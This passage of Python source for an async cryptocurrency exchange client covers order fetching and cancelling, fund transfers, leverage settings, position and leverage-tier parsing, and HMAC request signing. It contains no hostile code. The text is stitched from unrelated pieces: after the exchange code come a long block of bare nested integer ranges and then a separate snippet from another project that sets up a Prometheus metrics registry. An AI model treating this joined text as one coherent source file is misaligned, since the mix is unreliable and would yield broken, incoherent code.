request, requestParams = self.prepare_request(market, type, query) if contract else self.spot_order_prepare_request(market, stop, query)
request['order_id'] = orderId
methodMiddle = 'PriceOrders' if stop else 'Orders'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGet' + methodMiddle + 'OrderId',
'margin': 'privateSpotGet' + methodMiddle + 'OrderId',
'swap': 'privateFuturesGetSettle' + methodMiddle + 'OrderId',
'future': 'privateDeliveryGetSettle' + methodMiddle + 'OrderId',
})
response = await getattr(self, method)(self.extend(request, requestParams))
return self.parse_order(response, market)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetches all open orders
:param str symbol: Unified market symbol
:param int since: earliest time in ms for orders in the response
:param int limit: max number of order structures to return
:param dict params: exchange specific params
:param bool params['stop']: True for fetching stop orders
:param str params['type']: spot, margin, swap or future, if not provided self.options['defaultType'] is used
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for type='margin', if not provided self.options['defaultMarginMode'] is used
:returns: An array of order structures
"""
return await self.fetch_orders_by_status('open', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetches all closed orders
:param str symbol: Unified market symbol of the market to fetch orders for
:param int since: earliest time in ms for orders in the response
:param int limit: max number of order structures to return
:param dict params: exchange specific params
:param bool params['stop']: True for fetching stop orders
:param str params['type']: spot, swap or future, if not provided self.options['defaultType'] is used
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:returns: An array of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
return await self.fetch_orders_by_status('finished', symbol, since, limit, params)
async def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
market = None if (symbol is None) else self.market(symbol)
stop = self.safe_value(params, 'stop')
params = self.omit(params, 'stop')
type, query = self.handle_market_type_and_params('fetchOrdersByStatus', market, params)
spot = (type == 'spot') or (type == 'margin')
request, requestParams = self.multi_order_spot_prepare_request(market, stop, query) if spot else self.prepare_request(market, type, query)
if status == 'closed':
status = 'finished'
request['status'] = status
if limit is not None:
request['limit'] = limit
if since is not None and spot:
request['from'] = int(since / 1000)
methodTail = 'PriceOrders' if stop else 'Orders'
openSpotOrders = spot and (status == 'open') and not stop
if openSpotOrders:
methodTail = 'OpenOrders'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGet' + methodTail,
'margin': 'privateSpotGet' + methodTail,
'swap': 'privateFuturesGetSettle' + methodTail,
'future': 'privateDeliveryGetSettle' + methodTail,
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# SPOT Open Orders
#
# [
# {
# "currency_pair": "ADA_USDT",
# "total": 2,
# "orders": [
# {
# "id": "155498539874",
# "text": "apiv4",
# "create_time": "1652406843",
# "update_time": "1652406843",
# "create_time_ms": 1652406843295,
# "update_time_ms": 1652406843295,
# "status": "open",
# "currency_pair": "ADA_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "3",
# "price": "0.35",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "3",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "ADA",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# },
# ...
# ]
# },
# ...
# ]
#
# SPOT
#
# [
# {
# "id": "8834234273",
# "text": "3",
# "create_time": "1635406193",
# "update_time": "1635406193",
# "create_time_ms": 1635406193361,
# "update_time_ms": 1635406193361,
# "status": "closed",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot", # margin for margin orders
# "side": "sell",
# "amount": "0.0002",
# "price": "58904.01",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.0000",
# "fill_price": "11.790516",
# "filled_total": "11.790516",
# "fee": "0.023581032",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee_currency": "BTC"
# }
# ]
#
# Spot Stop
#
# [
# {
# "market": "ADA_USDT",
# "user": 10406147,
# "trigger": {
# "price": "0.65",
# "rule": "\u003c=",
# "expiration": 86400
# },
# "put": {
# "type": "limit",
# "side": "sell",
# "price": "0.65",
# "amount": "2.00000000000000000000",
# "account": "normal", # margin for margin orders
# "time_in_force": "gtc"
# },
# "id": 8449909,
# "ctime": 1652188982,
# "status": "open"
# }
# ]
#
# Perpetual Swap
#
# [
# {
# "status": "finished",
# "size": -1,
# "left": 0,
# "id": 82750739203,
# "is_liq": False,
# "is_close": False,
# "contract": "BTC_USDT",
# "text": "web",
# "fill_price": "60721.3",
# "finish_as": "filled",
# "iceberg": 0,
# "tif": "ioc",
# "is_reduce_only": True,
# "create_time": 1635403475.412,
# "finish_time": 1635403475.4127,
# "price": "0"
# }
# ]
#
result = response
if openSpotOrders:
result = []
for i in range(0, len(response)):
orders = self.safe_value(response[i], 'orders')
result = self.array_concat(result, orders)
orders = self.parse_orders(result, market, since, limit)
return self.filter_by_symbol_since_limit(orders, symbol, since, limit)
async def cancel_order(self, id, symbol=None, params={}):
"""
Cancels an open order
:param str id: Order id
:param str symbol: Unified market symbol
:param dict params: Parameters specified by the exchange api
:param bool params['stop']: True if the order to be cancelled is a trigger order
:returns: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
market = None if (symbol is None) else self.market(symbol)
stop = self.safe_value_2(params, 'is_stop_order', 'stop', False)
params = self.omit(params, ['is_stop_order', 'stop'])
type, query = self.handle_market_type_and_params('cancelOrder', market, params)
request, requestParams = self.spot_order_prepare_request(market, stop, query) if (type == 'spot' or type == 'margin') else self.prepare_request(market, type, query)
request['order_id'] = id
pathMiddle = 'Price' if stop else ''
method = self.get_supported_mapping(type, {
'spot': 'privateSpotDelete' + pathMiddle + 'OrdersOrderId',
'margin': 'privateSpotDelete' + pathMiddle + 'OrdersOrderId',
'swap': 'privateFuturesDeleteSettle' + pathMiddle + 'OrdersOrderId',
'future': 'privateDeliveryDeleteSettle' + pathMiddle + 'OrdersOrderId',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# spot
#
# {
# "id": "95282841887",
# "text": "apiv4",
# "create_time": "1637383156",
# "update_time": "1637383235",
# "create_time_ms": 1637383156017,
# "update_time_ms": 1637383235085,
# "status": "cancelled",
# "currency_pair": "ETH_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.01",
# "price": "3500",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.01",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "ETH",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
# spot conditional
#
# {
# "market": "ETH_USDT",
# "user": 2436035,
# "trigger": {
# "price": "3500",
# "rule": "\u003c=",
# "expiration": 86400
# },
# "put": {
# "type": "limit",
# "side": "buy",
# "price": "3500",
# "amount": "0.01000000000000000000",
# "account": "normal",
# "time_in_force": "gtc"
# },
# "id": 5891843,
# "ctime": 1637382379,
# "ftime": 1637382673,
# "status": "canceled"
# }
#
# perpetual swaps
#
# {
# id: "82241928192",
# contract: "BTC_USDT",
# mkfr: "0",
# tkfr: "0.0005",
# tif: "gtc",
# is_reduce_only: False,
# create_time: "1635196145.06",
# finish_time: "1635196233.396",
# price: "61000",
# size: "4",
# refr: "0",
# left: "4",
# text: "web",
# fill_price: "0",
# user: "6693577",
# finish_as: "cancelled",
# status: "finished",
# is_liq: False,
# refu: "0",
# is_close: False,
# iceberg: "0",
# }
#
return self.parse_order(response, market)
async def cancel_all_orders(self, symbol=None, params={}):
await self.load_markets()
market = None if (symbol is None) else self.market(symbol)
stop = self.safe_value(params, 'stop')
params = self.omit(params, 'stop')
type, query = self.handle_market_type_and_params('cancelAllOrders', market, params)
request, requestParams = self.multi_order_spot_prepare_request(market, stop, query) if (type == 'spot') else self.prepare_request(market, type, query)
methodTail = 'PriceOrders' if stop else 'Orders'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotDelete' + methodTail,
'margin': 'privateSpotDelete' + methodTail,
'swap': 'privateFuturesDeleteSettle' + methodTail,
'future': 'privateDeliveryDeleteSettle' + methodTail,
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# [
# {
# "id": 139797004085,
# "contract": "ADA_USDT",
# "mkfr": "0",
# "tkfr": "0.0005",
# "tif": "gtc",
# "is_reduce_only": False,
# "create_time": 1647911169.343,
# "finish_time": 1647911226.849,
# "price": "0.8",
# "size": 1,
# "refr": "0.3",
# "left": 1,
# "text": "api",
# "fill_price": "0",
# "user": 6693577,
# "finish_as": "cancelled",
# "status": "finished",
# "is_liq": False,
# "refu": 2436035,
# "is_close": False,
# "iceberg": 0
# }
# ...
# ]
#
return self.parse_orders(response, market)
async def transfer(self, code, amount, fromAccount, toAccount, params={}):
"""
makes internal transfers of funds between accounts on the same exchange
:param str code: unified currency code for currency being transferred
:param float amount: the amount of currency to transfer
:param str fromAccount: the account to transfer currency from
:param str toAccount: the account to transfer currency to
:param dict params: Exchange specific parameters
:param dict params['symbol']: Unified market symbol *required for type == margin*
:returns: A `transfer structure <https://docs.ccxt.com/en/latest/manual.html#transfer-structure>`
"""
await self.load_markets()
currency = self.currency(code)
fromId = self.parse_account(fromAccount)
toId = self.parse_account(toAccount)
truncated = self.currency_to_precision(code, amount)
request = {
'currency': currency['id'],
'amount': truncated,
}
if not (fromId in self.options['accountsByType']):
request['from'] = 'margin'
request['currency_pair'] = fromId
else:
request['from'] = fromId
if not (toId in self.options['accountsByType']):
request['to'] = 'margin'
request['currency_pair'] = toId
else:
request['to'] = toId
if fromId == 'margin' or toId == 'margin':
symbol = self.safe_string_2(params, 'symbol', 'currency_pair')
if symbol is None:
raise ArgumentsRequired(self.id + ' transfer requires params["symbol"] for isolated margin transfers')
market = self.market(symbol)
request['currency_pair'] = market['id']
params = self.omit(params, 'symbol')
if (toId == 'futures') or (toId == 'delivery') or (fromId == 'futures') or (fromId == 'delivery'):
request['settle'] = currency['lowerCaseId']
response = await self.privateWalletPostTransfers(self.extend(request, params))
#
# according to the docs(however the actual response seems to be an empty string '')
#
# {
# "currency": "BTC",
# "from": "spot",
# "to": "margin",
# "amount": "1",
# "currency_pair": "BTC_USDT"
# }
#
transfer = self.parse_transfer(response, currency)
return self.extend(transfer, {
'fromAccount': fromAccount,
'toAccount': toAccount,
'amount': self.parse_number(truncated),
})
def parse_account(self, account):
accountsByType = self.options['accountsByType']
if account in accountsByType:
return accountsByType[account]
elif account in self.markets:
market = self.market(account)
return market['id']
else:
keys = list(accountsByType.keys())
raise ExchangeError(self.id + ' accounts must be one of ' + ', '.join(keys) + ' or an isolated margin symbol')
def parse_transfer(self, transfer, currency=None):
timestamp = self.milliseconds()
return {
'id': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'currency': self.safe_currency_code(None, currency),
'amount': None,
'fromAccount': None,
'toAccount': None,
'status': None,
'info': transfer,
}
async def set_leverage(self, leverage, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')
# WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS
# AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS
if (leverage < 0) or (leverage > 100):
raise BadRequest(self.id + ' setLeverage() leverage should be between 0 and 100')
await self.load_markets()
market = self.market(symbol)
method = self.get_supported_mapping(market['type'], {
'swap': 'privateFuturesPostSettlePositionsContractLeverage',
'future': 'privateDeliveryPostSettlePositionsContractLeverage',
})
request, query = self.prepare_request(market, None, params)
defaultMarginMode = self.safe_string_2(self.options, 'marginMode', 'defaultMarginMode')
crossLeverageLimit = self.safe_string(query, 'cross_leverage_limit')
marginMode = self.safe_string(query, 'marginMode', defaultMarginMode)
if crossLeverageLimit is not None:
marginMode = 'cross'
leverage = crossLeverageLimit
if marginMode == 'cross' or marginMode == 'cross_margin':
request['query'] = {
'cross_leverage_limit': str(leverage),
'leverage': '0',
}
else:
request['query'] = {
'leverage': str(leverage),
}
response = await getattr(self, method)(self.extend(request, query))
#
# {
# "value": "0",
# "leverage": "5",
# "mode": "single",
# "realised_point": "0",
# "contract": "BTC_USDT",
# "entry_price": "0",
# "mark_price": "62035.86",
# "history_point": "0",
# "realised_pnl": "0",
# "close_order": null,
# "size": 0,
# "cross_leverage_limit": "0",
# "pending_orders": 0,
# "adl_ranking": 6,
# "maintenance_rate": "0.005",
# "unrealised_pnl": "0",
# "user": 2436035,
# "leverage_max": "100",
# "history_pnl": "0",
# "risk_limit": "1000000",
# "margin": "0",
# "last_close_pnl": "0",
# "liq_price": "0"
# }
#
return response
def parse_position(self, position, market=None):
#
# {
# value: "12.475572",
# leverage: "0",
# mode: "single",
# realised_point: "0",
# contract: "BTC_USDT",
# entry_price: "62422.6",
# mark_price: "62377.86",
# history_point: "0",
# realised_pnl: "-0.00624226",
# close_order: null,
# size: "2",
# cross_leverage_limit: "25",
# pending_orders: "0",
# adl_ranking: "5",
# maintenance_rate: "0.005",
# unrealised_pnl: "-0.008948",
# user: "663337",
# leverage_max: "100",
# history_pnl: "14.98868396636",
# risk_limit: "1000000",
# margin: "0.740721495056",
# last_close_pnl: "-0.041996015",
# liq_price: "59058.58"
# }
#
contract = self.safe_string(position, 'contract')
market = self.safe_market(contract, market)
size = self.safe_string(position, 'size')
side = None
if Precise.string_gt(size, '0'):
side = 'long'
elif Precise.string_lt(size, '0'):
side = 'short'
maintenanceRate = self.safe_string(position, 'maintenance_rate')
notional = self.safe_string(position, 'value')
leverage = self.safe_string(position, 'leverage')
marginMode = None
if leverage == '0':
marginMode = 'cross'
else:
marginMode = 'isolated'
unrealisedPnl = self.safe_string(position, 'unrealised_pnl')
# Initial Position Margin = ( Position Value / Leverage ) + Close Position Fee
# *The default leverage under full position(cross) mode is the highest leverage in the market.
# *Trading fee is charged as Taker Fee Rate(0.075%).
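# e.g.(illustrative numbers, isolated position): with notional "12.475572", leverage "25" and
# unrealised_pnl "-0.008948": feePaid = 0.00075 * 12.475572 ~ 0.009357,
# initialMargin ~ 12.475572 / 25 + 0.009357 ~ 0.508380, percentage ~ -0.008948 / 0.508380 * 100 ~ -1.76%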
takerFee = '0.00075'
feePaid = Precise.string_mul(takerFee, notional)
initialMarginString = Precise.string_add(Precise.string_div(notional, leverage), feePaid)
percentage = Precise.string_mul(Precise.string_div(unrealisedPnl, initialMarginString), '100')
return {
'info': position,
'symbol': self.safe_string(market, 'symbol'),
'timestamp': None,
'datetime': None,
'initialMargin': self.parse_number(initialMarginString),
'initialMarginPercentage': self.parse_number(Precise.string_div(initialMarginString, notional)),
'maintenanceMargin': self.parse_number(Precise.string_mul(maintenanceRate, notional)),
'maintenanceMarginPercentage': self.parse_number(maintenanceRate),
'entryPrice': self.safe_number(position, 'entry_price'),
'notional': self.parse_number(notional),
'leverage': self.safe_number(position, 'leverage'),
'unrealizedPnl': self.parse_number(unrealisedPnl),
'contracts': self.parse_number(Precise.string_abs(size)),
'contractSize': self.safe_value(market, 'contractSize'),
# 'realisedPnl': position['realised_pnl'],
'marginRatio': None,
'liquidationPrice': self.safe_number(position, 'liq_price'),
'markPrice': self.safe_number(position, 'mark_price'),
'collateral': self.safe_number(position, 'margin'),
'marginMode': marginMode,
'marginType': marginMode, # deprecated
'side': side,
'percentage': self.parse_number(percentage),
}
def parse_positions(self, positions):
result = []
for i in range(0, len(positions)):
result.append(self.parse_position(positions[i]))
return result
async def fetch_positions(self, symbols=None, params={}):
"""
Fetch all open positions
:param [str] symbols: not used by Gateio, but parsed internally by CCXT
:param dict params: exchange specific parameters
:param str params['settle']: 'btc' or 'usdt' - settle currency for perpetual swap and future - default="usdt" for swap and "btc" for future
:param str params['type']: swap or future, if not provided self.options['defaultType'] is used
:returns: An array of `position structures <https://docs.ccxt.com/en/latest/manual.html#position-structure>`
"""
await self.load_markets()
type, query = self.handle_market_type_and_params('fetchPositions', None, params)
request, requestParams = self.prepare_request(None, type, query)
method = self.get_supported_mapping(type, {
'swap': 'privateFuturesGetSettlePositions',
'future': 'privateDeliveryGetSettlePositions',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# [
# {
# value: "12.475572",
# leverage: "0",
# mode: "single",
# realised_point: "0",
# contract: "BTC_USDT",
# entry_price: "62422.6",
# mark_price: "62377.86",
# history_point: "0",
# realised_pnl: "-0.00624226",
# close_order: null,
# size: "2",
# cross_leverage_limit: "25",
# pending_orders: "0",
# adl_ranking: "5",
# maintenance_rate: "0.005",
# unrealised_pnl: "-0.008948",
# user: "6693577",
# leverage_max: "100",
# history_pnl: "14.98868396636",
# risk_limit: "1000000",
# margin: "0.740721495056",
# last_close_pnl: "-0.041996015",
# liq_price: "59058.58"
# }
# ]
#
result = self.parse_positions(response)
return self.filter_by_array(result, 'symbol', symbols, False)
async def fetch_leverage_tiers(self, symbols=None, params={}):
await self.load_markets()
type, query = self.handle_market_type_and_params('fetchLeverageTiers', None, params)
request, requestParams = self.prepare_request(None, type, query)
if type != 'future' and type != 'swap':
raise BadRequest(self.id + ' fetchLeverageTiers only supports swap and future')
method = self.get_supported_mapping(type, {
'swap': 'publicFuturesGetSettleContracts',
'future': 'publicDeliveryGetSettleContracts',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# Perpetual swap
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
# Delivery Futures
#
# [
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
# ]
#
return self.parse_leverage_tiers(response, symbols, 'name')
def parse_market_leverage_tiers(self, info, market=None):
"""
* @ignore
https://www.gate.io/help/futures/perpetual/22162/instrctions-of-risk-limit
:param dict info: Exchange market response for 1 market
:param dict market: CCXT market
"""
#
# Perpetual swap
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
# Delivery Futures
#
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
#
maintenanceMarginUnit = self.safe_string(info, 'maintenance_rate') # '0.005',
leverageMax = self.safe_string(info, 'leverage_max') # '100',
riskLimitStep = self.safe_string(info, 'risk_limit_step') # '1000000',
riskLimitMax = self.safe_string(info, 'risk_limit_max') # '16000000',
initialMarginUnit = Precise.string_div('1', leverageMax)
maintenanceMarginRate = maintenanceMarginUnit
initialMarginRatio = initialMarginUnit
floor = '0'
tiers = []
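        # Each tier covers one risk_limit_step of notional; the maintenance margin rate
        # and the initial margin ratio both increase by one base unit per tier.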
while(Precise.string_lt(floor, riskLimitMax)):
cap = Precise.string_add(floor, riskLimitStep)
tiers.append({
'tier': self.parse_number(Precise.string_div(cap, riskLimitStep)),
'currency': self.safe_string(market, 'settle'),
'minNotional': self.parse_number(floor),
'maxNotional': self.parse_number(cap),
'maintenanceMarginRate': self.parse_number(maintenanceMarginRate),
'maxLeverage': self.parse_number(Precise.string_div('1', initialMarginRatio)),
'info': info,
})
maintenanceMarginRate = Precise.string_add(maintenanceMarginRate, maintenanceMarginUnit)
initialMarginRatio = Precise.string_add(initialMarginRatio, initialMarginUnit)
floor = cap
return tiers
def sign(self, path, api=[], method='GET', params={}, headers=None, body=None):
authentication = api[0] # public, private
type = api[1] # spot, margin, future, delivery
query = self.omit(params, self.extract_params(path))
path = self.implode_params(path, params)
endPart = '' if (path == '') else ('/' + path)
entirePath = '/' + type + endPart
url = self.urls['api'][authentication][type]
if url is None:
raise NotSupported(self.id + ' does not have a testnet for the ' + type + ' market type.')
url += entirePath
if authentication == 'public':
if query:
url += '?' + self.urlencode(query)
else:
queryString = ''
if (method == 'GET') or (method == 'DELETE'):
if query:
queryString = self.urlencode(query)
url += '?' + queryString
else:
urlQueryParams = self.safe_value(query, 'query', {})
if urlQueryParams:
queryString = self.urlencode(urlQueryParams)
url += '?' + queryString
query = self.omit(query, 'query')
body = self.json(query)
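            # Private requests are signed with HMAC-SHA512 over the newline-joined fields:
            # METHOD, /api/<version><path>, query string, SHA512(body), timestamp.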
bodyPayload = '' if (body is None) else body
bodySignature = self.hash(self.encode(bodyPayload), 'sha512')
timestamp = self.seconds()
timestampString = str(timestamp)
signaturePath = '/api/' + self.version + entirePath
payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString]
# eslint-disable-next-line quotes
payload = "\n".join(payloadArray)
signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512)
headers = {
'KEY': self.apiKey,
'Timestamp': timestampString,
'SIGN': signature,
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
#
# {"label": "ORDER_NOT_FOUND", "message": "Order not found"}
# {"label": "INVALID_PARAM_VALUE", "message": "invalid argument: status"}
# {"label": "INVALID_PARAM_VALUE", "message": "invalid argument: Trigger.rule"}
# {"label": "INVALID_PARAM_VALUE", "message": "invalid argument: trigger.expiration invalid range"}
# {"label": "INVALID_ARGUMENT", "detail": "invalid size"}
#
label = self.safe_string(response, 'label')
if label is not None:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], label, feedback)
raise ExchangeError(feedback)
| [
[
[
226,
234
],
[
984,
992
]
],
[
[
242,
249
],
[
173881,
173888
]
],
[
[
279,
292
],
[
26805,
26818
],
[
27390,
27403
],
[
27513,
27526
],
[
27574,
27587
],
[
27639,
27652
],
[
27764,
27777
],
[
27830,
27843
],
[
27885,
27898
],
[
27996,
28009
],
[
28121,
28134
],
[
28190,
28203
],
[
28411,
28424
],
[
29200,
29213
],
[
29252,
29265
],
[
29300,
29313
],
[
29353,
29366
],
[
29582,
29595
],
[
29756,
29769
],
[
29867,
29880
],
[
30154,
30167
],
[
30207,
30220
],
[
30267,
30280
],
[
30329,
30342
],
[
30385,
30398
],
[
30491,
30504
],
[
30553,
30566
],
[
30611,
30624
],
[
30668,
30681
],
[
31117,
31130
],
[
31345,
31358
],
[
31991,
32004
],
[
153027,
153040
],
[
175027,
175040
]
],
[
[
322,
341
],
[
26863,
26882
],
[
26919,
26938
],
[
26976,
26995
],
[
27089,
27108
],
[
27157,
27176
],
[
27217,
27236
]
],
[
[
371,
387
],
[
27030,
27046
],
[
27327,
27343
]
],
[
[
417,
434
],
[
29694,
29711
]
],
[
[
464,
480
],
[
27276,
27292
],
[
27447,
27463
]
],
[
[
510,
527
],
[
26546,
26563
],
[
52680,
52697
],
[
91937,
91954
],
[
114558,
114575
],
[
151607,
151624
],
[
153693,
153710
]
],
[
[
557,
567
],
[
26328,
26338
],
[
26380,
26390
],
[
26432,
26442
],
[
26488,
26498
],
[
26600,
26610
],
[
26656,
26666
],
[
26706,
26716
],
[
26760,
26770
],
[
55265,
55275
],
[
118325,
118335
],
[
153995,
154005
],
[
162650,
162660
]
],
[
[
597,
606
],
[
28300,
28309
],
[
28356,
28365
],
[
29813,
29822
],
[
57968,
57977
],
[
92142,
92151
]
],
[
[
636,
653
],
[
27704,
27721
],
[
28740,
28757
],
[
28866,
28883
],
[
29637,
29654
],
[
29928,
29945
]
],
[
[
683,
695
],
[
28246,
28258
],
[
28574,
28586
],
[
28627,
28639
],
[
28684,
28696
],
[
28803,
28815
],
[
28926,
28938
],
[
28979,
28991
],
[
29034,
29046
],
[
29415,
29427
],
[
29468,
29480
],
[
29524,
29536
],
[
29992,
30004
],
[
30047,
30059
],
[
30101,
30113
],
[
30438,
30450
],
[
30725,
30737
],
[
30777,
30789
],
[
30829,
30841
],
[
30889,
30901
],
[
30946,
30958
],
[
31003,
31015
],
[
31058,
31070
],
[
115093,
115105
]
],
[
[
725,
738
],
[
28465,
28478
],
[
28523,
28536
],
[
29086,
29099
],
[
29146,
29159
]
],
[
[
768,
780
],
[
172551,
172563
]
],
[
[
810,
827
],
[
27932,
27949
]
],
[
[
857,
877
],
[
28056,
28076
],
[
31164,
31184
],
[
31222,
31242
],
[
31276,
31296
]
],
[
[
921,
930
],
[
19279,
19288
]
],
[
[
961,
968
],
[
35199,
35206
],
[
35284,
35291
],
[
42058,
42065
],
[
42120,
42127
],
[
42177,
42184
],
[
42241,
42248
],
[
43104,
43111
],
[
43218,
43225
],
[
47507,
47514
],
[
47577,
47584
],
[
47642,
47649
],
[
47714,
47721
],
[
48660,
48667
],
[
48782,
48789
],
[
105047,
105054
],
[
105118,
105125
],
[
110359,
110366
],
[
110429,
110436
],
[
114775,
114782
],
[
130055,
130062
],
[
130340,
130347
],
[
130487,
130494
],
[
131901,
131908
],
[
132761,
132768
],
[
132810,
132817
],
[
132876,
132883
],
[
132948,
132955
],
[
157376,
157383
],
[
157445,
157452
],
[
158184,
158191
],
[
158253,
158260
],
[
158272,
158279
],
[
158342,
158349
],
[
158361,
158368
],
[
158716,
158723
],
[
158819,
158826
],
[
159238,
159245
],
[
171020,
171027
],
[
171211,
171218
],
[
171270,
171277
],
[
171380,
171387
],
[
171729,
171736
],
[
171856,
171863
],
[
171954,
171961
]
],
[
[
977,
983
],
[
1058,
1064
]
]
] |
from prometheus_client import CollectorRegistry
from asyncworker.conf import settings
from asyncworker.metrics.collectors.gc import GCCollector
from asyncworker.metrics.collectors.platform import PlatformCollector
from asyncworker.metrics.collectors.process import ProcessCollector
NAMESPACE = (
f"{settings.METRICS_NAMESPACE}_{settings.METRICS_APPPREFIX}"
if settings.METRICS_APPPREFIX
else f"{settings.METRICS_NAMESPACE}"
)
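# A dedicated registry holding the platform, process and GC collectors, all sharing
# the namespace derived from the asyncworker settings above.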
REGISTRY = CollectorRegistry(auto_describe=True)
